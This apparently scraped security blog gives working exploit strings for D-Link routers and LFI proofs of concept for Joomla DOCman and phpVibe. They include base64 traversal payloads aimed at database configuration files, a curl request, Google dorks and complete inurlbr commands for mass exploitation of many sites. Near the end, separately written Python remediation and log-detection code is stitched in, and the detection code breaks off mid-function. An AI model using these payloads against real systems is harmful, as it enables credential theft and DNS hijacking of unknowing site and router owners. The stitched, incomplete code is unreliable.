<a href="http://www.exploit-db.com/exploits/35917/" target="_blank">http://www.exploit-db.com/exploits/35917/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP</span><br />
<a href="http://1337day.com/exploit/23302/" target="_blank">http://1337day.com/exploit/23302/</a><br />
<br />
<b>Exploit_model: LG DVR LE6016D / Unauthenticated users/passwords disclosure exploit</b><br />
<b>STRING GET:</b> <span style="font-family: Courier New, Courier, monospace;">/dvr/wwwroot/user.cgi</span><br />
<a href="http://www.exploit-db.com/exploits/36014/" target="_blank">http://www.exploit-db.com/exploits/36014/</a><br />
<br />
<b>Exploit_model: D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /web_cgi.cgi?&request=UploadFile&path=/etc/</span><br />
<a href="https://www.exploit-db.com/exploits/37454/" target="_blank">https://www.exploit-db.com/exploits/37454/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1</span><br />
<a href="https://www.exploit-db.com/exploits/37237/" target="_blank">https://www.exploit-db.com/exploits/37237/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=</span><br />
<a href="https://www.exploit-db.com/exploits/37240/" target="_blank">https://www.exploit-db.com/exploits/37240/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1</span><br />
<a href="https://www.exploit-db.com/exploits/37241/" target="_blank">https://www.exploit-db.com/exploits/37241/</a><br />
<br />
<b>Exploit_model: D-Link DSL-2640B - Unauthenticated Remote DNS Change Exploit</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP</span><br />
<a href="https://www.exploit-db.com/exploits/36105/" target="_blank">https://www.exploit-db.com/exploits/36105/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit</b><br />
<b>STRING GET:</b> <span style="font-family: Courier New, Courier, monospace;">/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8</span><br />
<a href="https://www.exploit-db.com/exploits/35917/" target="_blank">https://www.exploit-db.com/exploits/35917/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link AP 3200 - Multiple Vulnerabilities</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/html/tUserAccountControl.htm</span><br />
<a href="https://www.exploit-db.com/exploits/34206/" target="_blank">https://www.exploit-db.com/exploits/34206/</a><br />
<br />
<b>Exploit_model: D-Link info.cgi POST Request Buffer Overflow</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/common/info.cgi</span><br />
<a href="https://www.exploit-db.com/exploits/34063/" target="_blank">https://www.exploit-db.com/exploits/34063/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link hedwig.cgi Buffer Overflow in Cookie Header</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/hedwig.cgi</span><br />
<a href="https://www.exploit-db.com/exploits/33863/" target="_blank">https://www.exploit-db.com/exploits/33863/</a><br />
<br />
<b>Exploit_model:</b> <b>DGL-5500, DIR-855L and the DIR-835:</b><br />
<b>STRING GET:</b> <span style="font-family: Courier New, Courier, monospace;">/tools_admin.asp</span><br />
<a href="https://www.exploit-db.com/exploits/33520/" target="_blank">https://www.exploit-db.com/exploits/33520/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link models DGL-5500, DIR-855L, DIR-835 suffer</b><br />
<b>STRING GET:</b> <span style="font-family: Courier New, Courier, monospace;">/hnap.cgi</span><br />
<a href="https://www.exploit-db.com/exploits/33520/" target="_blank">https://www.exploit-db.com/exploits/33520/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-2750B ADSL Router - CSRF Vulnerability</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/scdmz.cmd?&fwFlag=50853375&dosenbl=1</span><br />
<a href="https://www.exploit-db.com/exploits/31569/" target="_blank">https://www.exploit-db.com/exploits/31569/</a><br />
<br />
<b>Exploit_model: D-Link DIR-100 - Multiple Vulnerabilities</b><br />
<b>STRING GET</b>:<span style="font-family: Courier New, Courier, monospace;"> /cliget.cgi?cmd=help</span><br />
<a href="https://www.exploit-db.com/exploits/31425/" target="_blank">https://www.exploit-db.com/exploits/31425/</a><br />
<br />
<b>Exploit_model: D-Link DSR Router Series - Remote Root Shell Exploit</b><br />
<b>STRING GET:</b> <span style="font-family: Courier New, Courier, monospace;">/scgi-bin/platform.cgi</span><br />
<a href="https://www.exploit-db.com/exploits/30062/" target="_blank">https://www.exploit-db.com/exploits/30062/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link Devices UPnP SOAP Telnetd Command Execution</b><br />
<b>STRING GET:</b> <span style="font-family: Courier New, Courier, monospace;">/soap.cgi</span><br />
<a href="https://www.exploit-db.com/exploits/28333/" target="_blank">https://www.exploit-db.com/exploits/28333/</a><br />
<br />
<b>Exploit_model: D-Link DIR-505 1.06 - Multiple Vulnerabilities</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc</span><br />
<a href="https://www.exploit-db.com/exploits/28184/" target="_blank">https://www.exploit-db.com/exploits/28184/</a><br />
<br />
<b>Exploit_model: D-Link Devices Unauthenticated Remote Command Execution</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/command.php</span><br />
<a href="https://www.exploit-db.com/exploits/27528/" target="_blank">https://www.exploit-db.com/exploits/27528/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DIR-645 1.03B08 - Multiple Vulnerabilities</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /authentication.cgi</span><br />
<a href="https://www.exploit-db.com/exploits/27283/" target="_blank">https://www.exploit-db.com/exploits/27283/</a><br />
<div>
<br /></div>
Posted by InurlBR, 2015-07-15T17:17:00-03:00: Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)<h4 style="clear: both; text-align: center;">
<span style="font-size: large;">Exploring component of Joomla cms</span></h4>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiddZ_0SDy1phB7Y3MX73KkELYr21BHc9ciHYVPCCp6mcuKgvOLA7_rkS-ahRfODYQ5tvv9K5aFTZ4Ai9l9jgPkXbe8vWGsNDchDrt0felXgzTod67qoP7p6LyzXte7FCdhuUtvyHeXHBB4/s1600/joomla-sql-injection.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI) # CWE: CWE-200(FPD) CWE-98(LFI/LFD) # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 13/07/2015 # Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman https://www.exploit-db.com/exploits/37620/" border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiddZ_0SDy1phB7Y3MX73KkELYr21BHc9ciHYVPCCp6mcuKgvOLA7_rkS-ahRfODYQ5tvv9K5aFTZ4Ai9l9jgPkXbe8vWGsNDchDrt0felXgzTod67qoP7p6LyzXte7FCdhuUtvyHeXHBB4/s400/joomla-sql-injection.jpg" title="# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI) # CWE: CWE-200(FPD) CWE-98(LFI/LFD) # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 13/07/2015 # Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman https://www.exploit-db.com/exploits/37620/" width="400" /></a></div>
<br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"># <a href="http://blog.inurl.com.br/search/label/joomla" target="_blank">Joomla</a> docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(<a href="http://blog.inurl.com.br/search/label/lfd" target="_blank">LFD</a>/<a href="http://blog.inurl.com.br/search/label/lfi" target="_blank">LFI</a>)</span><br />
<span style="font-family: Courier New, Courier, monospace;"># CWE: CWE-200(FPD) CWE-98(<a href="http://blog.inurl.com.br/search/label/lfi" target="_blank">LFI</a>/<a href="http://blog.inurl.com.br/search/label/lfd" target="_blank">LFD</a>)</span><br />
<span style="font-family: Courier New, Courier, monospace;"># Risk: <b>High</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"># Author: Hugo Santiago dos Santos</span><br />
<span style="font-family: Courier New, Courier, monospace;"># Contact: hugo.s@linuxmail.org</span><br />
<span style="font-family: Courier New, Courier, monospace;"># Date: 13/07/2015</span><br />
<span style="font-family: Courier New, Courier, monospace;"># Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman</span><br />
<a href="https://www.exploit-db.com/exploits/37620/" target="_blank">https://www.exploit-db.com/exploits/37620/</a><br />
<br />
The application has an unvalidated GET parameter, "<b>file=</b>", which allows arbitrary files to be downloaded from the server.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Google Dork:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">inurl:"/components/com_docman/dl2.php"</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>POC:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.site.com/components/com_docman/dl2.php?archive=0&file=<b>base64([LDF])</b></span><br />
<br />
Internally the application uses PHP's native <b>base64_decode</b> function to resolve the file it serves.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">string base64_decode ( string $data [, bool $strict = false ] );</span><br />
more <a href="http://php.net/manual/en/function.base64-decode.php">http://php.net/manual/en/function.base64-decode.php</a><br />
<br />
Since the application base64-decodes the parameter, the injection string has to be base64-encoded before it is sent.<br />
<br />
<b>injection string:</b><br />
<span style="font-family: Courier New, Courier, monospace;">../../../../../../../target/www/configuration.php</span> <b><= Not Ready</b><br />
<b><br />encoded string:</b><br />
<span style="font-family: Courier New, Courier, monospace;">Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==</span> <= <b>Ready !</b><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Example</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.site.com/components/com_docman/dl2.php?archive=0&file=<b>Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==</b></span> <= Ready !<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Using <a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">inurlbr</a> scanner for mass exploitation:</span><br />
Download script: <a href="https://github.com/googleinurl/SCANNER-INURLBR">https://github.com/googleinurl/SCANNER-INURLBR</a><br />
<b>- Creating our command</b><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET DORK:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--dork 'inurl:"/components/com_docman/dl2.php"'</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET OUTPUT FILE:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -s dl2.txt </span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET EXPLOIT GET</span></b><br />
To encode our injection string we use an internal function of the inurlbr script.<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">base64</span></b> Encrypt values in base64.<br />
Example: <span style="color: red; font-family: Courier New, Courier, monospace;"><b>base64(</b>{value}<b>)</b></span><br />
Usage: <span style="color: red; font-family: Courier New, Courier, monospace;"><b>base64(</b>102030<b>)</b></span><br />
Usage: <br />
<span style="font-family: Courier New, Courier, monospace;"><i>--exploit-get 'user?id=</i><b><span style="color: red;">base64(</span></b>102030<span style="color: red;"><b>)</b></span><i>'</i></span><br />
<span style="font-family: Courier New, Courier, monospace;"> </span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>URL with inject get</b>:</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"> http://www.target.us/</span><span style="font-family: 'Courier New', Courier, monospace;">user?id=</span><span style="color: red; font-family: Courier New, Courier, monospace;"><b>MTAyMDMw</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Use:</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--exploit-get</b> '/dl2.php?archive=0&file=<b>base64(</b></span><span style="font-family: 'Courier New', Courier, monospace;"><span style="color: red;">../../../../../../../target/www/configuration.php</span><b>)</b></span><span style="color: red; font-family: 'Courier New', Courier, monospace;">'</span><br />
<br />
OR USE SITE ENCODER: <a href="https://www.base64encode.org/" target="_blank">https://www.base64encode.org/</a><br />
Use:<br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='</span><br />
<br />
<b>SET FILTER </b><br />
Filter results in unique domains.<br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--unique</span><br />
<br />
<b>SET VALIDATION</b><br />
Validate results based on the returned HTTP code.<br />
Example: <span style="color: red; font-family: Courier New, Courier, monospace;">--ifcode {ifcode}</span><br />
Usage: <span style="color: red; font-family: Courier New, Courier, monospace;">--ifcode 200</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>COMPLETE COMMAND:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--dork</b> 'inurl:"/components/com_docman/dl2.php"' <b>-s</b> dl2.txt <b>--exploit-get</b> '/dl2.php?archive=0&file=<i>base64(</i>../../../../../../../target/www/configuration.php<i>)</i>' <b>--unique</b> <b>--ifcode</b> 200</span><br />
<br />
OR<br />
<br />
<span style="color: red; font-family: 'Courier New', Courier, monospace;">php inurlbr.php </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--dork</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> 'inurl:"/components/com_docman/dl2.php"' </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-s</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> dl2.txt </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--exploit-get</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> '/dl2.php?archive=0&file=</span><span style="color: red; font-family: 'Courier New', Courier, monospace;">Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==</span><span style="color: red; font-family: 'Courier New', Courier, monospace;">'</span><span style="color: red; font-family: 'Courier New', Courier, monospace;"> </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--unique</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--ifcode</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> 200</span><br />
<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Remediation:</b></span><br />
The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible, the application can maintain a whitelist of files that may be included by the page and use an identifier (for example an index number) to access the selected file. Any request containing an invalid identifier has to be rejected; that way there is no attack surface for malicious users to manipulate the path.<br />
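As an added example that is not part of this post and not DOCman's code, the whitelist-with-identifier remediation described above, written in Python: the client sends only an opaque identifier, a server-side table maps it to a file, and the resolved path is additionally checked to stay inside the document root. The document table, the <b>DownloadRejected</b> exception and the sample file names are constructed for the example; the encoded traversal string from this post is used only as an input the resolver must refuse.<br />

```python
import base64
import binascii
import os
import tempfile

# Constructed allowlist (an assumption for this example, not DOCman's data model):
# the only values a client may send are these opaque identifiers; the server,
# never the client, decides which file each one maps to.
ALLOWED_DOCUMENTS = {
    "1": "handbook.pdf",
    "2": "release-notes.txt",
}


class DownloadRejected(Exception):
    """Raised for any request that does not name an allowed document."""


def decode_identifier(param: str) -> str:
    """Strictly base64-decode the 'file' parameter. Invalid base64 or non-ASCII
    content is rejected here, so malformed input never reaches the filesystem."""
    try:
        return base64.b64decode(param, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        raise DownloadRejected("malformed identifier")


def resolve_download(param: str, doc_root: str) -> str:
    """Map the client-supplied parameter to a file path, or raise DownloadRejected."""
    ident = decode_identifier(param)
    filename = ALLOWED_DOCUMENTS.get(ident)
    if filename is None:
        raise DownloadRejected("unknown identifier")
    root = os.path.realpath(doc_root)
    path = os.path.realpath(os.path.join(root, filename))
    # Defence in depth: even a mis-configured allowlist entry must not escape
    # the document root (symlinks are resolved by realpath before the check).
    if os.path.commonpath([root, path]) != root:
        raise DownloadRejected("resolved path leaves the document root")
    if not os.path.isfile(path):
        raise DownloadRejected("document missing on disk")
    return path


def check_request(param: str, doc_root: str):
    """Convenience wrapper returning (allowed, detail) instead of raising."""
    try:
        return True, resolve_download(param, doc_root)
    except DownloadRejected as exc:
        return False, str(exc)


def demo() -> dict:
    """Exercise the resolver against a temporary document root."""
    with tempfile.TemporaryDirectory() as root:
        for name in ALLOWED_DOCUMENTS.values():
            with open(os.path.join(root, name), "w") as fh:
                fh.write("sample document\n")
        good = base64.b64encode(b"1").decode()  # "MQ=="
        # The encoded traversal string shown in this post, used here only as
        # input that the resolver must refuse.
        traversal = "Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=="
        return {
            "valid": check_request(good, root)[0],
            "traversal": check_request(traversal, root)[0],
            "not_base64": check_request("../../etc/passwd", root)[0],
            "unknown_id": check_request(base64.b64encode(b"999").decode(), root)[0],
        }


if __name__ == "__main__":
    print(demo())
```

The traversal string is rejected twice over: its decoded value is not a key in the table, and even if it were, the realpath containment check would refuse a path outside the document root.<br />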
<a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion">https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion</a><br />
<a href="https://www.owasp.org/index.php/Full_Path_Disclosure">https://www.owasp.org/index.php/Full_Path_Disclosure</a><br />
InurlBR<br />
<br />
phpVibe ALL versions LFD vulnerability, exploring with inurlbr (posted 2015-07-13)<h4 style="text-align: center;">
<span style="font-size: large;">Exploiting an LFD vulnerability in phpVibe</span></h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQLeHAvCSTOE6DPT44ERljfim4XKbOamqF3q8hvLsY-bBhRD0qJfROL8G1uYkx5f7N_xuI6GuBHMElIHOMQOwlb6qF-aLTMCqJP68ICiG_ED3YyVgAlOI1pKkeLCLghj9uCr9m_Tm4h9eG/s1600/Captura+de+tela+de+2015-07-13+22%253A39%253A32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="PHPVibe - A php video script built for sharing video and media. PHPVibe video sharing cms: php video embed and video upload script, ffmpeg video conversion, Youtube,Vine" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQLeHAvCSTOE6DPT44ERljfim4XKbOamqF3q8hvLsY-bBhRD0qJfROL8G1uYkx5f7N_xuI6GuBHMElIHOMQOwlb6qF-aLTMCqJP68ICiG_ED3YyVgAlOI1pKkeLCLghj9uCr9m_Tm4h9eG/s640/Captura+de+tela+de+2015-07-13+22%253A39%253A32.png" title="PHPVibe - A php video script built for sharing video and media. PHPVibe video sharing cms: php video embed and video upload script, ffmpeg video conversion, Youtube,Vine" width="640" /></a></div>
PHPVibe - A php video script built for sharing video and media. PHPVibe video sharing <a href="http://blog.inurl.com.br/search/label/cms" target="_blank">cms</a>: php video embed and video upload script, ffmpeg video conversion, Youtube,Vine<br />
<br />
# Exploit Title: phpVibe ALL versions LFD vulnerability<br />
<span style="font-size: large;"># Google Dork: "powered by phpvibe"</span><br />
# Date: 2015/07/13 (july 13th)<br />
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)<br />
# Vendor Homepage: http://www.phpvibe.com/<br />
# Software Link: http://get.phpvibe.com/<br />
# Version: All versions<br />
# Tested on: linux<br />
<a href="http://0day.today/exploit/23877">http://0day.today/exploit/23877</a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Vulnerable file:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">stream.php</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>POC:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">http://</span><span style="font-family: 'Courier New', Courier, monospace;">target</span><span style="font-family: Courier New, Courier, monospace;">.tld/stream.php?file=<b>../vibe_config.php@@media</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">http://</span><span style="font-family: 'Courier New', Courier, monospace;">target</span><span style="font-family: Courier New, Courier, monospace;">.tld/stream.php?file=<b>TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09</b></span><br />
<br />
<b>Code:</b><br />
<span style="font-family: Courier New, Courier, monospace;">$token = <b>htmlspecialchars(base64_decode(base64_decode($_GET["file"])));</b></span><br />
<br />
The file parameter has no validation or sanitization!<br />
Exploitation can be performed by adding "@@media" to the file name and base64-encoding it twice, as below (no registration needed).<br />
With a simple request one can get access to the MySQL database configuration file.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Example:</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">curl 'http://TARGET/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><br /></span>
OUTPUT PRINT:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU3S3xH1BZT0VRywIV7YBWuqtC8LDxOQUTiFlGsWAMY93gW3Io8aX5JAYA-D_hY4i94IcWv2k_hKrdbvJUuE24Lsh6MQYUGwhteoCx-JKzp5lR3yLz7h88EkGsdKLh-Sr7NPvhZbjizu8m/s1600/Captura+de+tela+de+2015-07-13+22%253A23%253A05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" Example: curl 'http://TARGET/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU3S3xH1BZT0VRywIV7YBWuqtC8LDxOQUTiFlGsWAMY93gW3Io8aX5JAYA-D_hY4i94IcWv2k_hKrdbvJUuE24Lsh6MQYUGwhteoCx-JKzp5lR3yLz7h88EkGsdKLh-Sr7NPvhZbjizu8m/s640/Captura+de+tela+de+2015-07-13+22%253A23%253A05.png" title=" Example: curl 'http://TARGET/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'" width="640" /></a></div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="font-size: large;">Using </span><a href="http://blog.inurl.com.br/search/label/INURLBR" style="font-size: x-large;" target="_blank">inurlbr</a><span style="font-size: large;"> scanner for mass exploitation:</span><br /> Download script: <a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a></span><br />
<b>- Creating our command</b><br />
<b><br /></b>
<b>SET DORK:</b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--dork '"powered by phpvibe"'</span><br />
<br />
<b>SET OUTPUT FILE:</b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -s telefone.txt </span><br />
<br />
<b>SET EXPLOIT GET</b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'</span><br />
<br />
<b>SET FILTER </b><br />
Filter results in unique domains.<br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--unique </span><br />
<br />
<div>
<b>SET VALIDATION</b></div>
<div>
Validate results based on the returned HTTP code. </div>
Example: <span style="color: red; font-family: Courier New, Courier, monospace;">--ifcode {ifcode}</span><br />
Usage: <span style="color: red; font-family: Courier New, Courier, monospace;">--ifcode 200</span><br />
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>COMPLETE COMMAND:</b></span></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--dork</b> '"powered by phpvibe"' <b>-s</b> telefone.txt <b>--exploit-get</b> '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09' <b>--unique</b> <b>--ifcode</b> 200</span></div>
<div>
<br /></div>
<div>
OUTPUT PRINT:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH_03_IF97LD94s8-ymfBIEWnRQnTcbztjb0ISaGCccmzfNmLLNKNjTZnv7XUef_Qor5ErNwu8YfVxk-mpr0bUehMJzyxOKWWYQ2EsOtEyhN7GIrP6pH8rmDEFCExHXK-F6eh4qTpwbJso/s1600/Captura+de+tela+de+2015-07-13+22%253A35%253A40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH_03_IF97LD94s8-ymfBIEWnRQnTcbztjb0ISaGCccmzfNmLLNKNjTZnv7XUef_Qor5ErNwu8YfVxk-mpr0bUehMJzyxOKWWYQ2EsOtEyhN7GIrP6pH8rmDEFCExHXK-F6eh4qTpwbJso/s640/Captura+de+tela+de+2015-07-13+22%253A35%253A40.png" width="640" /></a></div>
<div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Solution:</b></span><br />
<span style="font-size: large;">Improving validation of parameters passed to the application.</span></div>
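On the detection side, an added example that is not code from this post, the DOCman post above, or inurlbr: a small access-log scanner for the pattern both posts share, a base64-encoded <b>file</b> parameter that decodes to a traversal path (double-encoded in the phpVibe case, where the "@@media" marker also appears). The log lines are constructed for the example; the only request values taken from the posts are the two encoded strings shown above, and "aGFuZGJvb2sucGRm" is a constructed benign value.<br />

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed access-log lines in Apache combined-style format (not a real capture).
# The first two 'file' values are the encoded strings from the phpVibe and DOCman
# posts; the third is a constructed benign value ("handbook.pdf").
SAMPLE_LOG = """\
203.0.113.5 - - [13/Jul/2015:22:23:05 -0300] "GET /stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09 HTTP/1.1" 200 812
198.51.100.7 - - [13/Jul/2015:22:24:11 -0300] "GET /components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== HTTP/1.1" 200 2048
192.0.2.9 - - [13/Jul/2015:22:25:30 -0300] "GET /components/com_docman/dl2.php?archive=0&file=aGFuZGJvb2sucGRm HTTP/1.1" 200 91234
192.0.2.10 - - [13/Jul/2015:22:26:02 -0300] "GET /index.php HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Extract the raw 'file' value ourselves: parse_qs would turn '+' (a valid
# base64 character) into a space and corrupt the value before decoding.
FILE_PARAM_RE = re.compile(r"[?&]file=([^&\s]*)")
INDICATORS = ("../", "..\\", "@@media")


def decode_layers(value: str, max_layers: int = 2) -> list:
    """Peel up to max_layers of base64 off value and return each decoded layer.
    Decoding stops at the first layer that is not valid base64 or not printable
    text, so a benign value yields one layer and a double-encoded one yields two."""
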